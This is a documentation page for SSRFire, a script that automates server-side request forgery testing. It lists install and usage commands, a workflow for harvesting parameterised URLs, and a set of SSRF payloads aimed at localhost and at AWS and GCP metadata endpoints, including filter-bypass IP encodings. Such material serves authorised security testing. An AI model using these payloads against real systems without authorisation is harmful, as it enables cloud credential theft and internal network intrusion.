Description
SSRFire automates SSRF (Server-Side Request Forgery) discovery. It takes a list of URLs, injects SSRF payloads into parameters, and monitors for callbacks. Also checks for open redirects and XSS as bonus findings.
Installation
BASH
git clone https://github.com/micha3lb3n/SSRFire.git
cd SSRFire
chmod +x ssrfire.shBasic Usage
BASH
# Run against target domain
./ssrfire.sh -d target.com -s your-collaborator-url
# With URL list
./ssrfire.sh -l urls.txt -s your-collaborator-urlAdvanced Usage
BASH
# Custom headers
./ssrfire.sh -d target.com -s your-collaborator-url -H "Cookie: session=abc"
# Custom threads
./ssrfire.sh -l urls.txt -s your-collaborator-url -t 20Common SSRF Payloads
TEXT
# Internal network access
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/ (AWS metadata)
http://metadata.google.internal/ (GCP metadata)
# Bypass filters
http://0x7f000001 (hex IP)
http://2130706433 (decimal IP)
http://0177.0.0.1 (octal IP)
http://127.1 (short form)
http://[::1] (IPv6 localhost)Common Workflows
BASH
# Collect parameterized URLs → test for SSRF
gau target.com | grep -iE "url=|dest=|redirect=|uri=|path=|src=|domain=|site=" | sort -u > ssrf_candidates.txt
./ssrfire.sh -l ssrf_candidates.txt -s your-callback.oast.fun